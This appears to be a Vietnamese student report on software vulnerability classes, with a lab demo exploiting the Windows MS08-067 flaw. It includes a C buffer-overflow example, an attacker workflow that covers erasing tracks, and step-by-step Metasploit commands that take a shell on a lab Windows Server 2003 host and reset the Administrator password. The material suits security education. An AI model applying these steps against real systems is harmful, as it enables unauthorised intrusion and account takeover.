Tải bản đầy đủ (.docx) (26 trang)

Khai thác lỗ hổng + Demo khai thác MS08067

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (1.02 MB, 26 trang )

MỞ ĐẦU
Theo thống kê và tính toán của Cục An toàn thông tin và Trung tâm Ứng
cứu khẩn cấp máy tính Việt Nam (VNCERT) - Bộ TT&TT, năm 2016, Việt Nam
phát hiện 135.190 cuộc tấn công mạng, tăng gấp hơn 3 lần so với năm 2015,
trong đó có 10.276 cuộc tấn công lừa đảo (Phishing), 47.135 cuộc tấn công cài
phần mềm độc hại (Malware) và 77.779 cuộc tấn công thay đổi giao diện
(Deface). Trong đó, có 201 cuộc tấn công thay đổi giao diện vào các hệ thống có
tên miền “.gov.vn”.
Riêng trong nửa đầu năm 2017, Trung tâm VNCERT ghi nhận 6.303 cuộc
tấn công mạng vào các hệ thống thông tin của Việt Nam, bao gồm 1.522 cuộc tấn
công lừa đảo, 3.792 cuộc tấn công cài đặt phần mềm độc hại và 989 cuộc tấn
công thay đổi giao diện. Tổng số cuộc tấn công mạng vào các hệ thống thông tin
sử dụng tên miền “.gov.vn” trong 6 tháng đầu năm 2017 là 25 cuộc.
Các cuộc tấn công ngày nay ngày càng diễn biến phức tạp, với số lượng
các cuộc tấn công mạng vào những cơ quan, tổ chức, doanh nghiệp có chiều
hướng tăng so với các năm trước đây, nhất là các cuộc tấn công mạng vào hệ
thống thông tin của cơ quan nhà nước và các doanh nghiệp lớn.
Bài báo cáo này sẽ giới thiệu tổng quát về phương pháp Hacker sử dụng
để tấn công xâm nhập và khai thác các phiên bản hệ điều hành Windows, hệ
điều hành phổ biến nhất hiện nay ở Việt Nam. Từ đó sẽ nắm bắt và hiểu biết
được phần nào cách thức Hacker sử dụng và đưa ra các giải pháp phòng tránh
hợp lí giúp mỗi người bảo mật an toàn thông tin trong thời đại Internet ngày
nay.

1

1


MỤC LỤC


2

2


DANH SÁCH HÌNH TRONG BÀI BÁO CÁO
H2.1: Quá trình tấn công vào một hệ thống
H3.1 : Giao diện Kali Linux
H3.2: Giao diện Nessus
H4.1: Kịch bản tấn công qua lỗ hổng ms08-067
H4.2: Xem địa chỉ ip máy Kali
H4.3: Xem địa chỉ máy mục tiêu
H4.4: Thông tin mục tiêu sau khi dùng Nmap
H4.5: Giao diện Nessus trên web
H4.6: Giao diện chính Nessus sau khi đăng nhập
H4.7: Chọn cách cách quét trong Nessus
H4.8: Điền thông tin để tiến hành quét máy mục tiêu
H4.9: Quá trình quét lỗi trên Nessus được bắt đầu
H4.10: Phát hiện lỗi sau khi Nessus quét xong
H4.11: Giao diện Metasploit trên Kali
H4.12: Tìm kiếm module khai thác lỗi ms08-067 trên Metasploit
H4.13: Tiến hành khai thác ms08-067 trên Metasploit
H4.14: Khai thác thành công có thể xem thông tin mục tiêu
H4.15: Đổi password thành công

3

3



NỘI DUNG
1. Lỗ hổng phần mềm:
1.1. Khái niệm lỗ hổng phần mềm:
Lỗ hổng phần mềm đơn giản là điểm yếu trong hệ thống cho phép truy
cập bất hợp phát vào hệ thống.
1.2. Các loại lỗ hổng phần mềm: [2]
Phân loại lỗ hổng phần mềm theo 2 tiêu chí :
- Phân loại theo các sai sót của phần mềm.
- Phân loại theo quá trình phát triển phần mềm.
1.2.1. Phân loại theo các sai sót của phần mềm:
Các loại sai sót phổ biến trong phần mềm dẫn tới việc xuất hiện các lỗ
hổng phần mềm bao gồm:
1.2.1.1. Vi phạm an toàn bộ nhớ (Memory safety):
An toàn bộ nhớ là vấn đề đáng lo ngại trong quá trình phát triển phần
mềm nhằm mục đích tránh lỗi phần mềm gây ra lỗ hổng bảo mật với RAM như
gây ra tràn bộ đệm hoặc treo con trỏ.
Có một số loại lỗi bộ nhớ có thể xảy ra, tùy thuộc vào ngôn ngữ lập trình
được sử dụng:
* Lỗi tràn bộ đệm (Buffer overflow): Việc ghi dữ liệu quá phạm vi cho
phép có thể làm hỏng nội dung của các đối tượng liền kề trong bộ nhớ. Đây là
lỗi cổ điển nhất và ngày càng ít gặp bởi vì hầu hết các lập trình viên đều nhận
thức được và tránh lỗi này.
* Lỗi bộ nhớ động (Dynamic memory errors): Quản lý không chính xác
bộ nhớ động và con trỏ động.

4

4



* Biến chưa được khởi tạo: Xảy ra khi một biến chưa được gán một giá
trị khởi tạo. Nó có thể chứa bên trong nó (trong một số ngôn ngữ lập trình)
những giá trị lỗi.
* Lỗi tràn bộ nhớ: Gồm các lỗi sau:
- Stack overflow: Xảy ra khi chương trình chạy ra khỏi không gian
cho phép của ngăn xếp, thông thường vì đệ quy quá sâu.
- Allocation failures: Chương trình cố gắng sử dụng nhiều bộ nhớ
hơn số lượng có sẵn. Trong một số ngôn ngữ, tình trạng này phải được
kiểm tra bằng tay sau mỗi lần phân bổ.
Ví dụ :
void main(){
char str1[10];
char str2[5];
printf(“nhap vao mot chuoi”);
gets(str1) ;
strcpy(str2,str1) ;
return ;
}
Chương trình này yêu cầu nhập vào một chuỗi bất kỳ và sử dụng
hàm gets đễn nhận thông tin nhập vào. Sau đó dữ liệu mà người dùng cung cấp
được copy từ str1 sang tham số bộ nhớ đệm và hàm này được hoàn thành.
Hàm gets không tự kiểm tra giới hạn do đó khó có thể khẳng định rằng thông tin
nhập vào str1 không vượt quá 10 kí tự. Nếu người dùng nhập hơn 10 kí tự thì
chương trình sẽ bị sập. Hàm strcopy sẽ copy dữ liệu trong str1 sang str2. Tuy
nhiên str2 có kích thước nhỏ hơn str1, điều này có nghĩa là dù người dùng nhập
vào ít hơn 10 kí tự nhưng vẫn có thể nhiều hơn 5 kí tự vào str1, và khi copy
sang str2 sẽ gây ra hiện tượng tràn bộ nhớ đệm và chương trình cũng sẽ bị sập.

5


5


1.2.1.2. Lỗi xác thực đầu vào (Input validation):
Quá trình xác thực dữ liệu đầu vào là quá trình nhằm đảm bảo rằng một
chương trình phần mềm hoạt động trên dữ liệu rõ ràng, chính xác và hữu ích.
Nó sử dụng một số thói quen hay còn gọi là các quy tắc để kiểm tra tính đúng
đắn, tính ý nghĩa và bảo mật của dữ liệu được nhập vào hệ thống. Các quy tắc
có thể được thực hiện thông qua các cách thức kiểm tra tự động theo từ điển dữ
liệu hoặc bởi các điều kiện logic của chương trình.
1.2.1.3. Điều kiện thực hiện (Race condition):
Là hành vi của một hệ thống điện tử hoặc phần mềm mà đầu ra của nó phụ
thuộc vào trình tự hoặc thời gian của các sự kiện không kiểm soát được. Nó trở
thành lỗi khi các sự kiện không xảy ra theo trình tự đã được lập trình. Thuật ngữ
này bắt nguồn từ ý tưởng hai tín hiệu cùng chạy đua tới để tới đích trước.
1.2.1.4. Lỗi phân quyền lẫn lộn (Privilege confusion):
Lỗi phần quyền lẫn lộn xảy ra khi một chương trình máy tính bị lừa bởi
một người khác nhằm vi phạm vào các truy cập không được phép. Đây là một
loại hình cụ thể của lỗi chiếm quyền thực thi. Trong an ninh thông tin, vấn đề
này thường được coi là một ví dụ về lý do tại sao bảo mật dựa trên khả năng là
rất quan trọng.
1.2.1.5. Lỗi chiếm quyền thực thi (Privilege escalation):
Là hành vi khai thác một lỗi, lỗ hổng trong thiết kế hoặc giám sát cấu
hình trong một hệ điều hành hoặc phần mềm ứng dụng để truy cập tới các dữ
liệu được bảo vệ từ ứng dụng với các đặc quyền cao hơn sự cho phép. Kết quả
là kẻ tấn công có thể truy cập một ứng dụng với quyền lớn hơn dự định của nhà
phát triển hoặc quản trị hệ thống để thực hiện các hành vi trái phép.
Lỗi chiếm quyền thực thi xảy ra trong hai hình thức:
* Chiếm quyền thực thi theo chiều dọc: hay còn gọi là nâng cao đặc
quyền, nơi mà người sử dụng có đặc quyền thấp hơn hoặc các ứng dụng truy

cập các chức năng hay nội dung dành cho người sử dụng hoặc ứng dụng có
quyền cao hơn.
6

6


Ví dụ: như người sử dụng Internet Banking có thể truy cập các chức năng
quản trị của trang web hoặc mật khẩu cho một Smartphone bị bỏ qua.
* Chiếm quyền thực thi theo chiều ngang: Là cách mà một người sử dụng
bình thương có thể truy cập các chức năng hoặc nội dung dành cho người sử
dụng bình thường khác.
Ví dụ: như người dùng A có thể sử dụng Internet Banking để truy cập vào
tài khoản của người dùng B.
1.2.2.Phân loại theo quá trình phát triển phần mềm:
1.2.2.1. Lỗi thiết kế:
Lỗ hổng trong thiết kế là một vấn đề phát sinh từ những sai lầm cơ bản
trong thiết kế hoặc trong giám sát của bước thiết kế phần mềm. Với các lỗ hổng
trong thiết kế, phần mềm sẽ không an toàn vì nó không chính xác với những gì
phần mềm nên được thiết kế để làm. Nó có thể là các thiết kế đơn giản nhưng
vẫn gây ra những lỗi lớn. Những sai sót thường xảy ra do những giả định về môi
trường của hệ thống không đúng với những gì mà hệ thống sẽ thực hiện hoặc
tương tác. Lỗi trong thiết kế được gọi là lỗ hổng có mức độ cao, những lỗ hổng
kiến trúc, hoặc các hạn chế, các vấn đề với các chương trình phần mềm.
1.2.2.2. Lỗi thực hiện:
Khi nói về các lỗ hổng ở bước thực hiện xây dựng chương trình thì mã
nguồn chương trình đóng vai trò quan trọng nhất, nhưng cũng là nguyên nhân
gây ra các lỗ hổng phần mềm lớn nhất. Đúng như tên gọi của nó, các lỗ hổng
phần mềm thuộc loại này thường phát sinh trong quá trình thực hiện xây dựng
phần mềm, nhưng đôi khi cũng phát sinh ở giai đoạn tích hợp và kiểm thử phần

mềm. Những lỗ hổng này gây ra sự sai lệch giữa việc thiết kế và thực hiện xây
dựng phần mềm. Đánh giá chung thì các lỗ hổng ở bước này thường là các lỗ
hổng ở mức độ thấp hoặc chỉ là các lỗi kỹ thuật.
1.2.2.3 Lỗi sử dụng:
Lỗ hổng trong vận hành, sử dụng hệ thống là các vấn đề an ninh phát sinh
trong quá trình vận hành, sử dụng một phần hoặc toàn bộ hệ thống phần mềm
7

7


trong một môi trường cụ thể. Cách thức phân biệt loại lỗ hổng này là đánh giá
các lỗ hổng không có trong mã nguồn của phần mềm hoặc chính xác hơn là
đánh giá cách phần mềm tương tác với môi trường của nó. Nó có thể bao gồm
các vấn đề với việc cấu hình phần mềm trong môi trường của nó hoặc vấn đề
liên quan tới các tác động tự động hoặc thủ công xung quanh phần mềm. Lỗ
hổng này có thể bao gồm một số phương thức tấn công vào người dùng của hệ
thống.
1.3. Nguyên nhân:
Các lập trình viên thường phải làm việc theo tiến độ do đội quản lý đặt ra,
mặc dù việc hoàn thành đúng tiến độ đã là một thử thách.
=> Do đó, các nhà phát triển phải cố gắng để tạo ra được sản phẩm đảm
bảo tính an ninh nhưng không thể xác định được tất cả lỗi trước ngày phát hành
dự kiến.
Trì hoãn lại rất tốn kém, nên các công ty thường sẽ phát hình phiên bản
đầu tiên và sau khi tìm thấy lỗi (tự tìm thấy hoặc nhận phản ánh từ người dùng),
họ sẽ vá lỗ hổng bằng việc phát hành bản cập nhật an ninh.
Tuy nhiên, các công ty phần mềm không thể hỗ trợ các sản phẩm của
mình mãi mãi. Để duy trì hoạt động kinh doanh họ sẽ cho ra mắt phiên bản mới
và bán các phiên bản cập nhật. Sau một thời gian công ty sẽ ngừng phát hành

các bản vá cho các chương trình cũ.
Vì vấn đề kinh phí, nhiều người dùng vẫn sử dụng những phiên bản cũ
tồn tại các lỗ hổng chưa được vá. Điều này tạo cơ hội cho những kẻ tấn công
tìm thấy những lỗ hổng trong phần mềm cũ.
2. Quá trình tấn công:
2.1. Các lỗ hổng thường khai thác trên hệ điều hành Windows:

8

8


Phần mềm máy tính ngày nay vô cùng phức tạp, bao gồm hàng ngàn
dòng mã. Phần mềm được viết ra bởi con người, nên cũng chẳng có gì lạ khi
trong đó có chứa những lỗi lập trình, được biết đến với tên gọi lỗ hổng. Những
lỗ hổng này được Hacker sử dụng để xâm nhập vào hệ thống, cũng như được
tác giả của các đọan mã độc dùng để khởi động chương trình của họ một cách tự
động trên máy tính của bạn.
Hiện nay các lỗ hổng bảo mật được phát hiện càng nhiều trong các hệ
điều hành, các Web Server hay các phần mềm khác,... Và các hãng sản xuất
luôn cập nhật các lỗ hổng và đưa ra các phiên bản mới sau khi đã vá lại các lỗ
hổng của các phiên bản trước. Do đó, người sử dụng phải luôn cập nhật thông
tin và nâng cấp phiên bản cũ mà mình đang sử dụng nếu không các Hacker sẽ
lợi dụng điều này để tấn công vào hệ thống. Thông thường, các forum của các
hãng nổi tiếng luôn cập nhật các lỗ hổng bảo mật và việc khai thác các lỗ hổng
đó như thế nào thì tùy từng người.
Microsoft luôn có những cải tiến an ninh vượt trội qua mỗi phiên bản mới
của hệ điều hành Windows. Tuy nhiên, một sự thật là các mối đe dọa mạng vẫn
đang ngày càng phát triển nhanh hơn so với chu trình cập nhật và đổi mới hệ
điều hành của Microsoft.

Tội phạm mạng thường sử dụng các lỗ hổng trong các mã chương trình
để truy cập vào các dữ liệu và tài nguyên trên máy tính bị lỗi bảo mật. Các
chương trình độc hại được thiết kế đặc biệt để khai thác các lỗ hổng này, được
gọi là kỹ thuật exploit, đang ngày càng phổ biến nhanh chóng.
Những sản phẩm của Microsoft thường gặp phải các lỗ hổng bảo mật như
HĐH Windows, Internet Explorer, Windows Server, Microsoft Exchange và
.NetFramework.
2.2. Quá trình tấn công một hệ thống:
Gồm 6 công đoạn như sau:
9

9


H2.1: Quá trình tấn công vào một hệ thống







Enumerate (Liệt kê): Liệt kê tất cả những thông tin có thể trong hệ thống.
Crack: Mục tiêu phải đạt tới là quyền truy cập vào hệ thống.
Ví dụ chúng ta bẻ khóa mật khẩu đăng nhập của user…
Escalste (Leo thang): Nói cho dễ hiểu là chuyển đổi giới hạn truy cập từ
user bình thường lên quyền cao hơn đủ cho chúng ta tấn công.
Execute (Thực thi): Thực thi ứng dụng trên hệ thống máy đích.
Hide (Ẩn file): Làm ẩn đi, tránh bị mục tiêu phát hiện tiêu diệt.
Tracks (Dấu vết): Xóa hết những thông tin có liên quan đến cuộc tấn

công.
Tóm lại, quá trình tấn công hệ thống (System Hacking) là bước tiếp theo

sau quá trình khảo sát, thu thập thông tin của mục tiêu cần áp dụng cho mục
đích truy tìm thông tin.
Khi hệ thống mục tiêu đã được xác định, chúng ta bắt đầu đi vào quá
trình tấn công hệ thống thật sự. Ta phải tiến hành những kỹ thuật khác nhau để
10

10


làm sao vào được trong hệ thống đó, thực hiện những việc mà mình mong
muốn, như xóa dữ liệu, chạy chương trình trojan, keylogger…
3. Giới thiệu môi trường và công cụ khai thác lỗ hổng phần mềm MS08067:
3.1. Kali linux : [3]
Kali Linux là hệ điều hành mã nguồn mở ,được thiết kế để các hacker vả
các chuyên gia bảo mật có trong tài hàng loạt công cụ kiểm thử, điều tra số,
hacking và dịch ngược mã nguồn. Kali là phiên bản mới nhất và tuyệt nhất của
Backtrack Linux. Kali được tân trang lại từ đầu để trở thành tốt nhất và hầu hết
các tính năng phong phú về kiểm thử bảo mật được xây dựng sẵn. Kali chạy
trên nhiều thiết bị phần cứng tăng hiệu quả lựa chọn cho thâm nhập hoặc “kiểm
thử” hệ thống.

H3.1 : Giao diện Kali Linux
11

11



3.2. Metasploit: [1]
3.2.1. Metasploit là gì?
Metasploit project là một dự án máy an ninh máy tính mã nguồn mở cung
cấp thông tin về lỗ hổng bảo mật và hỗ trợ việc thử nghiệm thâm nhập và phát
triển IDS(Intrusion Detection Systems_Hệ thống phát hiện xâm nhập) signature.
Project nổi tiếng nhất của nó là Metasploit Framework, một công cụ để
phát triển và thực thi exploit code (mã khai thác) đối với một máy tính mục tiêu
từ xa. Các project quan trọng khác bao gồm: Database Opcode, lưu trữ
shellcode, và nghiên cứu bảo mật.
Giao diện và môi trường Metasploit project cũng nổi tiếng với các công
cụ anti-forensic và evasion, một số trong đó được xây dựng vào Metasploit
Framework.
Metasploit đã được tạo ra bởi HD Moore vào năm 2003 như một công cụ
mạng di động bằng cách sử dụng ngôn ngữ kịch bản Perl. Sau đó, Metasploit
Framework đã được viết lại hoàn toàn bằng ngôn ngữ lập trình Ruby và đã trở
thành project Ruby lớn nhất thế giới, với hơn 700,000 dòng code. Nó là một
công cụ mạnh mẽ cho các nhà nghiên cứu an ninh của bên thứ ba để điều tra lỗ
hổng bảo mật tiềm năng.
3.2.2. Các thành phần của Metasploit:
Console interface: Dùng msfconsole.bat để mở interface này. Msfconsole
interface sử dụng các dòng lệnh để cấu hình, kiểm tra nên nhanh hơn và mềm
dẻo hơn, đặc biệt interface này còn hỗ trợ sử dụng phím tab để hoàn thành dòng
lệnh giống như cisco IOS nên dễ sử dụng hơn cho người dùng.
Command line interface: Dùng msfcli.bat
Global Enviroment: Được thực thi thông qua 2 câu lệnh set và unset,
những options được gán ở đây sẽ mang tính toàn cục, được đưa vào tất cả các
module exploits.

12


12


Temporary Enviroment: Được thực thi thông qua 2 câu lệnh set và unset,
enviroment này chỉ được đưa vào module exploit đang load hiện tại, không ảnh
hưởng đến các module exploit khác.
3.3: Công cụ Nmap:[5]
Nmap là một công cụ mã nguồn mở miễn phí dùng cho việc theo dõi và
kiểm tra an ninh mạng chạy trên mọi hệ điều hành chính. Nmap có một phiên
bản giao diện được gọi là Zenmap làm cho việc sử dụng Nmap dễ dàng hơn.
Các chức năng của nmap:


Liệt kê các port đang mở trên một host.
Xác định các dịch vụ chạy trên các port đang mở cùng với phần




mềm và phiên bản đang dùng.
Xác đinh hệ điều hành của thiết bị.
Chạy các script đặc biệt.



3.4: Công cụ Nessus: [4]
Nessus là công cụ quét lỗ hổng bảo mật do Tenable Network Security
phát triển .Nessus có thể chạy trên nhiều nền tảng hệ điều hành khác nhau, bao
gồm cả UNIX, Linux, Mac OS X, Windows. Phiên bản Nessus 5.0 trở đi có thể
chạy trên giao diện web, do đó có thể dễ dàng truy cập, sử dụng trên mọi hệ

điều hành.

13

13


H3.2: Giao diện Nessus

14

14


4. Kịch bản tấn công mục tiêu trong mạng LAN qua lỗ hổng MS08-067 và
demo:
4.1.Lỗ hổng MS08-067:
Nguyên nhân của lỗ hổng ms08-067 là do lỗi trong thư viện NetAPI32.dll
thông qua dịch vụ máy chủ (Server Service).
Giao thức RPC của dịch vụ Server Service trong Windows hỗ trợ một thủ
tục được gọi từ xa và xử lý các yêu cầu đổi đường dẫn (Ví dụ: \\C\Program
Files\...\Windows) về định dạng đường dẫn Canonicalization ngắn gọn hơn
(\\C\Windows). Tuy nhiên, với một đường dẫn quá dài, Windows xử lý không
tốt dẫn đến tràn bộ đệm.
4.2.Giới thiệu công cụ được sử dụng trong demo:

2.

Máy tính chạy hệ điều hành Kali Linux : địa chỉ ip 192.168.44.128
đóng vai trò là máy tấn công

Máy tính chạy hệ điều hành Window Server 2003 : địa chỉ ip

3.
4.
5.

192.168.44.130 đóng vai trò là máy mục tiêu
Công cụ Nmap
Công cụ Nessus
Công cụ Metasploit

1.

15

15


4.3.Demo khai thác lỗ hổng MS08-067:

H4.1: Kịch bản tấn công qua lỗ hổng ms08-067

Kiểm tra địa chỉ ip máy Kali Linux bằng cách mở cửa số Terminal gõ
“ifconfig”

16

16



H4.2: Xem địa chỉ ip máy Kali

17

17


Kiểm tra địa chỉ máy mục tiêu bằng cách bật cửa sổ Terminal gõ
“ipconfig”

H4.3: Xem địa chỉ máy mục tiêu

Kiểm tra port đang mở bằng công cụ Nmap có sẵn trên Kali Linux
Gõ nmap 192.168.44.130/24

H4.4: Thông tin mục tiêu sau khi dùng Nmap

18

18


Dùng công cụ Nessus để quét lỗ hổng mục tiêu:
Đăng nhập vào giao diện đăng nhập của chương trình:

H4.5: Giao diện Nessus trên web

Đăng nhập thành công chương trình có giao diện:

H4.6: Giao diện chính Nessus sau khi đăng nhập

19

19


20

20


Chọn New Scan  Basic Network Scan

H4.7: Chọn cách cách quét trong Nessus
Tiếp theo điền:
- Name (tên): demoBTL
- Description (chú thích): ghi gì cũng được
- Folder: nơi chứa tệp tin scan được ban đầu có 2 tùy chọn là thư
mục My Scans và Trash, mặc định sẽ là My Scans
- Scanner: loại hình scan mặc định là Local Scanner
- Targets: địa chỉ ip máy mục tiêu
Click chọn Save

21

21


H4.8: Điền thông tin để tiến hành quét máy mục tiêu

Sau khi chọn Save thì quá trình scan được bắt đầu


H4.9: Quá trình quét lỗi trên Nessus được bắt đầu
Đợi vài phút quá trình Scan kết thúc ta chọn vào dòng “demoBTL” để
biết kết quả

22

22


H4.10: Phát hiện lỗi sau khi Nessus quét xong

Ta thấy có máy mục tiêu có lỗ hổng MS08-067, ta tiến hành khai thác
Ở cửa sổ Terminal trên máy Kali Linux bật Metasploit bằng cách gõ
“msfconsole” rồi bấm Enter và đợi cho nó lên được như sau

H4.11: Giao diện Metasploit trên Kali
23

23


Tìm kiếm modules khai thác lỗ hổng ms08-067 trên metasploit
Gõ search ms08-067

H4.12: Tìm kiếm module khai thác lỗi ms08-067 trên Metasploit
Sự dụng modules khai thác ms08-067 trong Metasploit
Gõ use exploit/windows/smb/ms08_067_netapi
Nhập địa chỉ ip máy mục tiêu
Gõ set rhost 192.168.44.130

Thực thi module sau khi xác định địa chỉ ip của mục tiêu
Gõ run

H4.13: Tiến hành khai thác ms08-067 trên Metasploit
24

24


Sau khi tạo được kết nối
Gõ lệnh sysinfo để xem thông tin máy mục tiêu
Khi đã thâm nhập thành công, tiến hành
Gõ lệnh shell để vào ổ đĩa máy mục tiêu

H4.14: Khai thác thành công có thể xem thông tin mục tiêu
Thực hiện đổi passwork tài khoản Administrator thành mật khẩu mới là
“12345”

H4.15: Đổi password thành công
Đổi thành công.

25

25


×